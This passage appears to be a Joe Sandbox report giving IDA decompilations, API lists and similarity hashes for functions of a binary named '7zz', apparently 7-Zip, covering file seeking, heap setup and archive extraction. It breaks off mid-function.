                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004183FD Relevance: 3.1, APIs: 2, Instructions: 85COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 52%
                                                                                  			E004183FD(intOrPtr __ecx) {
				long _t31;
				intOrPtr* _t32;
				intOrPtr* _t33;
				intOrPtr* _t42;
				intOrPtr _t53;
				intOrPtr _t59;
				long _t62;
				void* _t64;
				void* _t65;

				L0046B890(E00474DEA, _t65);
				_push(__ecx);
				_push(__ecx);
				_t59 = __ecx;
				 *((intOrPtr*)(_t65 - 0x14)) = 0;
				 *(_t65 - 4) = 0;
				 *((intOrPtr*)(_t65 - 0x10)) = 0;
				 *(_t65 - 4) = 1;
				if( *((intOrPtr*)(_t65 + 0x10)) == 0) {
					if( *((intOrPtr*)(_t65 + 0x14)) != 0) {
						goto L12;
					} else {
						_push(0x40);
						_t53 = L004079F2();
						 *((intOrPtr*)(_t65 + 0x10)) = _t53;
						 *(_t65 - 4) = 2;
						if(_t53 == 0) {
							_t64 = 0;
						} else {
							_t64 = E0040CF63(_t53);
						}
						 *(_t65 - 4) = 1;
						E0040C9B4(_t65 - 0x14, _t64);
						if(E0040CF41(_t64,  *((intOrPtr*)(_t59 + 4))) != 0) {
							 *((intOrPtr*)(_t65 + 0x14)) =  *((intOrPtr*)(_t65 - 0x14));
							goto L12;
						} else {
							_t31 = GetLastError();
						}
					}
				} else {
					_push(8);
					_t42 = L004079F2();
					if(_t42 == 0) {
						_t42 = 0;
					} else {
						 *((intOrPtr*)(_t42 + 4)) = 0;
						 *_t42 = 0x47ab90;
					}
					E0040C9B4(_t65 - 0x10, _t42);
					L12:
					_t31 = E00417BAE(_t59,  *((intOrPtr*)(_t65 + 8)),  *((intOrPtr*)(_t65 + 0xc)),  *((intOrPtr*)(_t65 + 0x14)),  *((intOrPtr*)(_t65 - 0x10)),  *((intOrPtr*)(_t65 + 0x18))); // executed
				}
				_t62 = _t31;
				_t32 =  *((intOrPtr*)(_t65 - 0x10));
				 *(_t65 - 4) = 0;
				if(_t32 != 0) {
					 *((intOrPtr*)( *_t32 + 8))(_t32);
				}
				_t33 =  *((intOrPtr*)(_t65 - 0x14));
				 *(_t65 - 4) =  *(_t65 - 4) | 0xffffffff;
				if(_t33 != 0) {
					 *((intOrPtr*)( *_t33 + 8))(_t33);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t65 - 0xc));
				return _t62;
			}












                                                                                  0x00418402
                                                                                  0x00418407
                                                                                  0x00418408
                                                                                  0x0041840e
                                                                                  0x00418410
                                                                                  0x00418413
                                                                                  0x00418416
                                                                                  0x0041841c
                                                                                  0x00418420
                                                                                  0x00418449
                                                                                  0x00000000
                                                                                  0x0041844b
                                                                                  0x0041844b
                                                                                  0x00418453
                                                                                  0x00418455
                                                                                  0x0041845a
                                                                                  0x0041845e
                                                                                  0x00418469
                                                                                  0x00418460
                                                                                  0x00418465
                                                                                  0x00418465
                                                                                  0x0041846f
                                                                                  0x00418473
                                                                                  0x00418484
                                                                                  0x00418491
                                                                                  0x00000000
                                                                                  0x00418486
                                                                                  0x00418486
                                                                                  0x00418486
                                                                                  0x00418484
                                                                                  0x00418422
                                                                                  0x00418422
                                                                                  0x00418424
                                                                                  0x0041842c
                                                                                  0x00418439
                                                                                  0x0041842e
                                                                                  0x0041842e
                                                                                  0x00418431
                                                                                  0x00418431
                                                                                  0x0041843f
                                                                                  0x00418494
                                                                                  0x004184a5
                                                                                  0x004184a5
                                                                                  0x004184aa
                                                                                  0x004184ac
                                                                                  0x004184b1
                                                                                  0x004184b4
                                                                                  0x004184b9
                                                                                  0x004184b9
                                                                                  0x004184bc
                                                                                  0x004184bf
                                                                                  0x004184c5
                                                                                  0x004184ca
                                                                                  0x004184ca
                                                                                  0x004184d5
                                                                                  0x004184dd

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00418402
                                                                                  • GetLastError.KERNEL32(00000001,00000000,?,?,00000000,?,?,00418604,?,00000001,?,?,?,?,?,00000000), ref: 00418486
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorH_prologLast
                                                                                  • String ID:
                                                                                  • API String ID: 1057991267-0
                                                                                  • Opcode ID: 308fd318d4d419b36d2cf5317f0bba856b964c67d85d69ddef6ecca4757266ff
                                                                                  • Instruction ID: 4421d415675076c99ccf6d41903839941164c9ea02229811d1821141610bcbe1
                                                                                  • Opcode Fuzzy Hash: 308fd318d4d419b36d2cf5317f0bba856b964c67d85d69ddef6ecca4757266ff
                                                                                  • Instruction Fuzzy Hash: 1F319F7190011AEFCB14DFA9C9856EEBBA1FF44304F14416FE809A3291DF384E80D76A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040BA47 Relevance: 3.0, APIs: 2, Instructions: 44COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 79%
                                                                                  			E0040BA47(void** __ecx, long _a4, long _a8, long _a12, long* _a16) {
				long _v8;
				long _v12;
				long _t21;
				long _t22;
				long* _t23;
				void** _t27;

				_t27 = __ecx;
				_push(__ecx);
				_push(__ecx);
				if(__ecx[1] != 0 && __ecx[1] != 0 && _a12 == 2) {
					_a4 = __ecx[2] + _a4;
					_a12 = 0;
					asm("adc [ebp+0xc], esi");
				}
				_t21 = _a4;
				_v8 = _a8;
				_v12 = _t21;
				_t22 = SetFilePointer( *_t27, _t21,  &_v8, _a12); // executed
				_v12 = _t22;
				if(_t22 != 0xffffffff || GetLastError() == 0) {
					_t23 = _a16;
					 *_t23 = _v12;
					_t23[1] = _v8;
					return 1;
				} else {
					return 0;
				}
			}









                                                                                  0x0040ba47
                                                                                  0x0040ba4a
                                                                                  0x0040ba4b
                                                                                  0x0040ba51
                                                                                  0x0040ba62
                                                                                  0x0040ba68
                                                                                  0x0040ba6b
                                                                                  0x0040ba6e
                                                                                  0x0040ba75
                                                                                  0x0040ba78
                                                                                  0x0040ba7e
                                                                                  0x0040ba85
                                                                                  0x0040ba8e
                                                                                  0x0040ba91
                                                                                  0x0040baa1
                                                                                  0x0040baa7
                                                                                  0x0040baac
                                                                                  0x00000000
                                                                                  0x0040ba9d
                                                                                  0x00000000
                                                                                  0x0040ba9d

                                                                                  APIs
                                                                                  • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040BA85
                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 0040BA93
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastPointer
                                                                                  • String ID:
                                                                                  • API String ID: 2976181284-0
                                                                                  • Opcode ID: 7436a2b139077620537afe951a30d7268c4488ead8e20398b421a651f671a27a
                                                                                  • Instruction ID: 7184b7cf4ce748ed61815dc5e944d1670cffa5033586876219b28924bd56fada
                                                                                  • Opcode Fuzzy Hash: 7436a2b139077620537afe951a30d7268c4488ead8e20398b421a651f671a27a
                                                                                  • Instruction Fuzzy Hash: A4014474600248EFCB00CF64D44089E7BB5EF45314B24C5AAE814A7391D376DE45DF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0046EA66 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E0046EA66(void* __ecx, intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;
				void* _t9;
				void* _t10;
				void* _t12;

				_t12 = __ecx;
				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				_t15 = _t6;
				 *0x496580 = _t6;
				if(_t6 == 0) {
					L7:
					return 0;
				} else {
					_t8 = L0046E91E(_t12, _t15);
					 *0x496584 = _t8;
					if(_t8 != 3) {
						__eflags = _t8 - 2;
						if(_t8 != 2) {
							goto L8;
						} else {
							_t10 = L0046F60A();
							goto L5;
						}
					} else {
						_t10 = L0046EAC3(0x3f8);
						L5:
						if(_t10 != 0) {
							L8:
							_t9 = 1;
							return _t9;
						} else {
							HeapDestroy( *0x496580);
							goto L7;
						}
					}
				}
			}








                                                                                  0x0046ea66
                                                                                  0x0046ea77
                                                                                  0x0046ea7d
                                                                                  0x0046ea7f
                                                                                  0x0046ea84
                                                                                  0x0046eabc
                                                                                  0x0046eabe
                                                                                  0x0046ea86
                                                                                  0x0046ea86
                                                                                  0x0046ea8e
                                                                                  0x0046ea93
                                                                                  0x0046eaa2
                                                                                  0x0046eaa5
                                                                                  0x00000000
                                                                                  0x0046eaa7
                                                                                  0x0046eaa7
                                                                                  0x00000000
                                                                                  0x0046eaa7
                                                                                  0x0046ea95
                                                                                  0x0046ea9a
                                                                                  0x0046eaac
                                                                                  0x0046eaae
                                                                                  0x0046eabf
                                                                                  0x0046eac1
                                                                                  0x0046eac2
                                                                                  0x0046eab0
                                                                                  0x0046eab6
                                                                                  0x00000000
                                                                                  0x0046eab6
                                                                                  0x0046eaae
                                                                                  0x0046ea93

                                                                                  APIs
                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,0046CFAA,00000001), ref: 0046EA77
                                                                                    • Part of subcall function 0046E91E: GetVersionExA.KERNEL32 ref: 0046E93D
                                                                                  • HeapDestroy.KERNEL32 ref: 0046EAB6
                                                                                    • Part of subcall function 0046EAC3: HeapAlloc.KERNEL32(00000000,00000140,0046EA9F,000003F8), ref: 0046EAD0
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap$AllocCreateDestroyVersion
                                                                                  • String ID:
                                                                                  • API String ID: 2507506473-0
                                                                                  • Opcode ID: 529c86f540b2e3f00af20ac8cc2ba51f405252cf123252289ac745e0dd2c21fe
                                                                                  • Instruction ID: 6733a5d0b54313f111c3d21430f7c760d78354a0b10c30e4881add0b2ce5f3d9
                                                                                  • Opcode Fuzzy Hash: 529c86f540b2e3f00af20ac8cc2ba51f405252cf123252289ac745e0dd2c21fe
                                                                                  • Instruction Fuzzy Hash: 12F06D78610301AAEB205BB3AC0572A36D0BB50792F25483BF804C85E4FB6889C4A61B
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 004290C5 Relevance: 2.1, APIs: 1, Instructions: 563COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 87%
                                                                                  			E004290C5(signed char __edx) {
				signed int _t311;
				signed char _t313;
				signed int _t315;
				signed char _t316;
				intOrPtr _t319;
				void* _t325;
				intOrPtr _t329;
				intOrPtr _t331;
				signed char _t332;
				intOrPtr _t337;
				signed char _t339;
				signed char _t344;
				intOrPtr _t345;
				signed char _t356;
				signed char _t357;
				signed char _t358;
				signed char _t361;
				signed char _t362;
				signed char _t367;
				signed char _t368;
				signed char _t369;
				signed char _t377;
				signed char _t378;
				signed char _t381;
				signed char _t382;
				signed char _t388;
				signed char _t389;
				signed char _t395;
				signed char _t397;
				signed char _t398;
				signed char _t402;
				signed char _t414;
				signed int _t422;
				intOrPtr _t430;
				intOrPtr _t439;
				signed char _t443;
				signed char _t449;
				signed char _t450;
				signed char _t451;
				signed int _t453;
				void* _t455;
				intOrPtr _t457;
				signed int _t472;
				intOrPtr _t526;
				signed char _t536;
				signed int _t538;
				intOrPtr* _t539;
				signed int _t542;
				intOrPtr _t546;
				signed char _t549;
				void* _t551;
				signed char _t552;
				signed int _t554;
				intOrPtr _t555;
				void* _t556;
				void* _t558;

				_t536 = __edx;
				_t311 = L0046B890(0x476cd8, _t556);
				_t449 = 0;
				 *(_t556 - 4) = 0;
				 *((char*)(_t556 - 0x60)) = _t311 & 0xffffff00 |  *(_t556 + 0x14) != 0x00000000;
				_t313 =  *(_t556 + 0x18);
				 *((intOrPtr*)(_t556 - 0x10)) = _t558 - 0x138;
				 *(_t556 + 0x18) = _t313;
				if(_t313 != 0) {
					 *((intOrPtr*)( *_t313 + 4))(_t313);
				}
				 *(_t556 - 4) = 1;
				 *(_t556 - 0x38) = _t449;
				 *(_t556 - 0x34) = _t449;
				 *((char*)(_t556 + 0x17)) =  *((intOrPtr*)(_t556 + 0x10)) == 0xffffffff;
				if( *((char*)(_t556 + 0x17)) != 0) {
					 *((intOrPtr*)(_t556 + 0x10)) =  *((intOrPtr*)( *(_t556 + 8) + 0xdc));
				}
				if( *((intOrPtr*)(_t556 + 0x10)) != _t449) {
					E00405B9F(_t556 - 0x30);
					 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
					_t315 = 0;
					__eflags = 0;
					 *(_t556 - 4) = 2;
					 *(_t556 - 0x18) = 0;
					while(1) {
						__eflags = _t315 -  *((intOrPtr*)(_t556 + 0x10));
						if(_t315 >=  *((intOrPtr*)(_t556 + 0x10))) {
							break;
						}
						__eflags =  *((char*)(_t556 + 0x17));
						if( *((char*)(_t556 + 0x17)) == 0) {
							_t315 =  *( *(_t556 + 0xc) + _t315 * 4);
						}
						_t544 =  *(_t556 + 8);
						 *(_t556 - 0x1c) = _t315;
						_t554 =  *( *((intOrPtr*)( *(_t556 + 8) + 0x228)) + _t315 * 4);
						__eflags = _t554 - 0xffffffff;
						if(_t554 != 0xffffffff) {
							_t422 =  *(_t556 - 0x28);
							__eflags = _t422 - _t449;
							if(_t422 == _t449) {
								L16:
								 *(_t556 - 0x90) =  *(_t556 - 0x90) | 0xffffffff;
								 *(_t556 - 0x8c) = _t554;
								E0042999D(_t556 - 0x88);
								 *(_t556 - 0x70) = _t449;
								 *(_t556 - 0x6c) = _t449;
								_push(_t556 - 0x90);
								 *(_t556 - 4) = 5;
								E004299F0(_t556 - 0x30);
								 *(_t556 - 4) = 2;
								E00408604(_t556 - 0x88);
								_t526 = E00429826( *((intOrPtr*)( *((intOrPtr*)(_t544 + 0xb8)) + _t554 * 4)));
								_t67 = _t556 - 0x38;
								 *_t67 =  *(_t556 - 0x38) + _t526;
								__eflags =  *_t67;
								_t430 =  *((intOrPtr*)( *((intOrPtr*)(_t556 - 0x24)) +  *(_t556 - 0x28) * 4 - 4));
								asm("adc [ebp-0x34], edx");
								 *((intOrPtr*)(_t430 + 0x20)) = _t526;
								 *(_t430 + 0x24) = _t536;
								L17:
								_t546 =  *((intOrPtr*)( *((intOrPtr*)(_t556 - 0x24)) +  *(_t556 - 0x28) * 4 - 4));
								_t457 =  *((intOrPtr*)( *((intOrPtr*)( *(_t556 + 8) + 0x214)) + _t554 * 4));
								_t555 =  *((intOrPtr*)(_t546 + 0x10));
								while(1) {
									_t435 =  *(_t556 - 0x1c) - _t457;
									__eflags = _t555 -  *(_t556 - 0x1c) - _t457;
									if(_t555 >  *(_t556 - 0x1c) - _t457) {
										goto L13;
									}
									_t87 = _t546 + 8; // 0xa
									L0043AC2F(_t87, _t435 & 0xffffff00 | __eflags == 0x00000000);
									_t555 = _t555 + 1;
								}
								goto L13;
							}
							_t439 =  *((intOrPtr*)( *((intOrPtr*)(_t556 - 0x24)) + _t422 * 4 - 4));
							__eflags = _t554 -  *((intOrPtr*)(_t439 + 4));
							if(_t554 ==  *((intOrPtr*)(_t439 + 4))) {
								goto L17;
							}
							goto L16;
						} else {
							_push(_t554);
							_push(_t315);
							_push(E004298B3(_t556 - 0x144));
							 *(_t556 - 4) = 3;
							E004299F0(_t556 - 0x30);
							 *(_t556 - 4) = 2;
							E00408604(_t556 - 0x13c);
							L13:
							_t315 =  *(_t556 - 0x18) + 1;
							_t449 = 0;
							 *(_t556 - 0x18) = _t315;
							continue;
						}
					}
					_t316 =  *(_t556 + 0x18);
					__eflags =  *((intOrPtr*)( *_t316 + 0xc))(_t316,  *(_t556 - 0x38),  *(_t556 - 0x34)) - _t449;
					if(__eflags == 0) {
						E00426448(_t556 - 0x11c, __eflags, 1);
						_push(0x38);
						 *(_t556 - 4) = 7;
						 *(_t556 - 0x44) = _t449;
						 *(_t556 - 0x40) = _t449;
						 *(_t556 - 0x4c) = _t449;
						 *(_t556 - 0x48) = _t449;
						_t319 = L004079F2();
						 *((intOrPtr*)(_t556 + 0x10)) = _t319;
						__eflags = _t319 - _t449;
						 *(_t556 - 4) = 8;
						if(_t319 == _t449) {
							_t549 = 0;
							__eflags = 0;
						} else {
							_t549 = L0040F3E5(_t319);
						}
						__eflags = _t549 - _t449;
						 *(_t556 - 4) = 7;
						 *(_t556 - 0x34) = _t549;
						 *(_t556 - 0x14) = _t549;
						if(_t549 != _t449) {
							 *((intOrPtr*)( *_t549 + 4))(_t549);
						}
						_push(_t449);
						 *(_t556 - 4) = 9;
						L0040F478(_t549,  *(_t556 + 0x18));
						_t538 = 0;
						__eflags = 0;
						 *(_t556 - 0x1c) = 0;
						while(1) {
							 *(_t549 + 0x28) =  *(_t556 - 0x4c);
							 *(_t549 + 0x2c) =  *(_t556 - 0x48);
							 *(_t549 + 0x20) =  *(_t556 - 0x44);
							 *(_t549 + 0x24) =  *(_t556 - 0x40);
							_t325 = L0040F554(_t549);
							__eflags = _t325 - _t449;
							if(_t325 != _t449) {
								break;
							}
							__eflags = _t538 -  *(_t556 - 0x28);
							if(_t538 <  *(_t556 - 0x28)) {
								_push(0x38);
								 *(_t556 - 0x54) = _t449;
								 *(_t556 - 0x50) = _t449;
								_t539 =  *((intOrPtr*)( *((intOrPtr*)(_t556 - 0x24)) + _t538 * 4));
								 *((intOrPtr*)(_t556 - 0x5c)) =  *((intOrPtr*)(_t539 + 0x20));
								 *((intOrPtr*)(_t556 - 0x58)) =  *((intOrPtr*)(_t539 + 0x24));
								_t329 = L004079F2();
								 *((intOrPtr*)(_t556 - 0x3c)) = _t329;
								__eflags = _t329 - _t449;
								 *(_t556 - 4) = 0xb;
								if(_t329 == _t449) {
									_t450 = 0;
									__eflags = 0;
								} else {
									_t450 = E00429F42(_t329);
								}
								__eflags = _t450;
								 *(_t556 - 0x18) = _t450;
								 *(_t556 - 4) = 9;
								 *(_t556 + 0x14) = _t450;
								if(_t450 != 0) {
									 *((intOrPtr*)( *_t450 + 4))(_t450);
								}
								 *(_t556 - 4) = 0xc;
								_t551 =  *(_t556 + 8) + 0x70;
								_t331 =  *_t539;
								__eflags = _t331 - 0xffffffff;
								if(_t331 == 0xffffffff) {
									_t331 =  *((intOrPtr*)( *((intOrPtr*)(_t551 + 0x1a4)) +  *(_t539 + 4) * 4));
								}
								__eflags =  *( *(_t556 + 8) + 0x14);
								_t332 = E0042A06F(_t450, _t551, 0, _t331, _t539 + 8,  *(_t556 + 0x18),  *((intOrPtr*)(_t556 - 0x60)),  *(_t556 + 8) & 0xffffff00 |  *( *(_t556 + 8) + 0x14) != 0x00000000); // executed
								_t451 = _t332;
								__eflags = _t451;
								if(_t451 == 0) {
									__eflags =  *_t539 - 0xffffffff;
									if( *_t539 == 0xffffffff) {
										_t453 =  *(_t539 + 4) << 2;
										 *((intOrPtr*)(_t556 - 0x3c)) =  *((intOrPtr*)( *((intOrPtr*)(_t551 + 0x48)) + _t453));
										 *(_t556 - 0x54) = E00429872(_t551,  *(_t539 + 4));
										 *(_t556 - 0x50) = _t536;
										_t337 =  *((intOrPtr*)(_t551 + 0x17c));
										_t542 =  *( *((intOrPtr*)(_t551 + 0x190)) + _t453) << 3;
										_t455 =  *((intOrPtr*)(_t337 + _t542)) +  *((intOrPtr*)(_t551 + 0x148));
										asm("adc eax, [esi+0x14c]");
										 *(_t556 + 0xc) =  *(_t556 + 0xc) & 0x00000000;
										 *((intOrPtr*)(_t556 - 0x64)) =  *((intOrPtr*)(_t337 + _t542 + 4));
										_t339 =  *(_t556 + 0x18);
										 *(_t556 - 4) = 0xe;
										__eflags = _t339;
										if(__eflags != 0) {
											_t536 = _t556 + 0xc;
											 *((intOrPtr*)( *_t339))(_t339, 0x47a578, _t536);
										}
										 *(_t556 - 4) = 0xf;
										_t344 = E004264F7(_t556 - 0x11c, __eflags,  *((intOrPtr*)( *(_t556 + 8) + 0x6c)), _t455,  *((intOrPtr*)(_t556 - 0x64)),  *((intOrPtr*)(_t551 + 0xc)) + _t542,  *((intOrPtr*)(_t556 - 0x3c)),  *(_t556 + 0x14),  *(_t556 - 0x14),  *(_t556 + 0xc), _t556 + 0x13, 1,  *((intOrPtr*)( *(_t556 + 8) + 0x10))); // executed
										_t552 = _t344;
										__eflags = _t552 - 1;
										if(_t552 != 1) {
											__eflags = _t552 - 0x80004001;
											if(_t552 != 0x80004001) {
												__eflags = _t552;
												if(_t552 == 0) {
													_t472 =  *(_t556 - 0x18);
													_t345 =  *((intOrPtr*)(_t472 + 0x18));
													__eflags =  *((intOrPtr*)(_t472 + 0x28)) -  *((intOrPtr*)(_t345 + 8));
													if( *((intOrPtr*)(_t472 + 0x28)) ==  *((intOrPtr*)(_t345 + 8))) {
														 *(_t556 - 4) = 0xc;
														L0043361B(_t556 + 0xc);
														 *(_t556 - 4) = 9;
														L0043361B(_t556 + 0x14);
														goto L104;
													}
													_t552 = E0042A381(_t472, _t556, 2);
													 *(_t556 - 4) = 0xc;
													__eflags = _t552;
													if(_t552 == 0) {
														L0043361B(_t556 + 0xc);
														 *(_t556 - 4) = 9;
														L0043361B(_t556 + 0x14);
														goto L101;
													}
													_t356 =  *(_t556 + 0xc);
													__eflags = _t356;
													if(_t356 != 0) {
														 *((intOrPtr*)( *_t356 + 8))(_t356);
													}
													_t357 =  *(_t556 + 0x14);
													 *(_t556 - 4) = 9;
													__eflags = _t357;
													if(_t357 != 0) {
														 *((intOrPtr*)( *_t357 + 8))(_t357);
													}
													_t358 =  *(_t556 - 0x14);
													 *(_t556 - 4) = 7;
													__eflags = _t358;
													if(__eflags != 0) {
														 *((intOrPtr*)( *_t358 + 8))(_t358);
													}
													 *(_t556 - 4) = 2;
													E00429925(_t556 - 0x11c, __eflags);
													 *(_t556 - 4) = 1;
													E004299B8(_t556 - 0x30);
													goto L96;
												}
												_t367 =  *(_t556 + 0xc);
												 *(_t556 - 4) = 0xc;
												__eflags = _t367;
												if(_t367 != 0) {
													 *((intOrPtr*)( *_t367 + 8))(_t367);
												}
												_t368 =  *(_t556 + 0x14);
												 *(_t556 - 4) = 9;
												__eflags = _t368;
												if(_t368 != 0) {
													 *((intOrPtr*)( *_t368 + 8))(_t368);
												}
												_t369 =  *(_t556 - 0x14);
												 *(_t556 - 4) = 7;
												__eflags = _t369;
												if(__eflags != 0) {
													 *((intOrPtr*)( *_t369 + 8))(_t369);
												}
												 *(_t556 - 4) = 2;
												E00429925(_t556 - 0x11c, __eflags);
												 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
												 *(_t556 - 4) = 0x12;
												goto L65;
											}
											_t552 = E0042A381( *(_t556 - 0x18), _t556, 1);
											_t377 =  *(_t556 + 0xc);
											__eflags = _t552;
											 *(_t556 - 4) = 0xc;
											if(_t552 == 0) {
												goto L75;
											}
											__eflags = _t377;
											if(_t377 != 0) {
												 *((intOrPtr*)( *_t377 + 8))(_t377);
											}
											_t381 =  *(_t556 + 0x14);
											 *(_t556 - 4) = 9;
											__eflags = _t381;
											if(_t381 != 0) {
												 *((intOrPtr*)( *_t381 + 8))(_t381);
											}
											_t382 =  *(_t556 - 0x14);
											 *(_t556 - 4) = 7;
											__eflags = _t382;
											if(__eflags != 0) {
												 *((intOrPtr*)( *_t382 + 8))(_t382);
											}
											 *(_t556 - 4) = 2;
											E00429925(_t556 - 0x11c, __eflags);
											 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
											 *(_t556 - 4) = 0x11;
											goto L65;
										} else {
											_t552 = E0042A381( *(_t556 - 0x18), _t556, 2);
											_t377 =  *(_t556 + 0xc);
											__eflags = _t552;
											 *(_t556 - 4) = 0xc;
											if(_t552 == 0) {
												L75:
												__eflags = _t377;
												if(_t377 != 0) {
													 *((intOrPtr*)( *_t377 + 8))(_t377);
												}
												_t378 =  *(_t556 + 0x14);
												 *(_t556 - 4) = 9;
												__eflags = _t378;
												if(_t378 != 0) {
													 *((intOrPtr*)( *_t378 + 8))(_t378);
												}
												L101:
												 *(_t556 - 4) = 9;
												L104:
												 *(_t556 - 0x1c) =  *(_t556 - 0x1c) + 1;
												 *(_t556 - 0x4c) =  *(_t556 - 0x4c) +  *((intOrPtr*)(_t556 - 0x5c));
												_t549 =  *(_t556 - 0x34);
												_t538 =  *(_t556 - 0x1c);
												asm("adc [ebp-0x48], eax");
												 *(_t556 - 0x44) =  *(_t556 - 0x44) +  *(_t556 - 0x54);
												asm("adc [ebp-0x40], eax");
												_t449 = 0;
												continue;
											}
											__eflags = _t377;
											if(_t377 != 0) {
												 *((intOrPtr*)( *_t377 + 8))(_t377);
											}
											_t388 =  *(_t556 + 0x14);
											 *(_t556 - 4) = 9;
											__eflags = _t388;
											if(_t388 != 0) {
												 *((intOrPtr*)( *_t388 + 8))(_t388);
											}
											_t389 =  *(_t556 - 0x14);
											 *(_t556 - 4) = 7;
											__eflags = _t389;
											if(__eflags != 0) {
												 *((intOrPtr*)( *_t389 + 8))(_t389);
											}
											 *(_t556 - 4) = 2;
											E00429925(_t556 - 0x11c, __eflags);
											 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
											 *(_t556 - 4) = 0x10;
											L65:
											E0040862D();
											 *(_t556 - 4) = 1;
											E00408604(_t556 - 0x30);
											L96:
											_t361 =  *(_t556 + 0x18);
											 *(_t556 - 4) =  *(_t556 - 4) & 0x00000000;
											__eflags = _t361;
											L97:
											if(__eflags != 0) {
												 *((intOrPtr*)( *_t361 + 8))(_t361);
											}
											_t362 = _t552;
											goto L105;
										}
									}
									_t395 =  *(_t556 + 0x14);
									 *(_t556 - 4) = 9;
									__eflags = _t395;
									if(_t395 != 0) {
										 *((intOrPtr*)( *_t395 + 8))(_t395);
									}
									goto L104;
								} else {
									_t397 =  *(_t556 + 0x14);
									 *(_t556 - 4) = 9;
									__eflags = _t397;
									if(_t397 != 0) {
										 *((intOrPtr*)( *_t397 + 8))(_t397);
									}
									_t398 =  *(_t556 - 0x14);
									 *(_t556 - 4) = 7;
									__eflags = _t398;
									if(__eflags != 0) {
										 *((intOrPtr*)( *_t398 + 8))(_t398);
									}
									 *(_t556 - 4) = 2;
									E00429925(_t556 - 0x11c, __eflags);
									 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
									 *(_t556 - 4) = 0xd;
									E0040862D();
									 *(_t556 - 4) = 1;
									E00408604(_t556 - 0x30);
									_t402 =  *(_t556 + 0x18);
									 *(_t556 - 4) =  *(_t556 - 4) & 0x00000000;
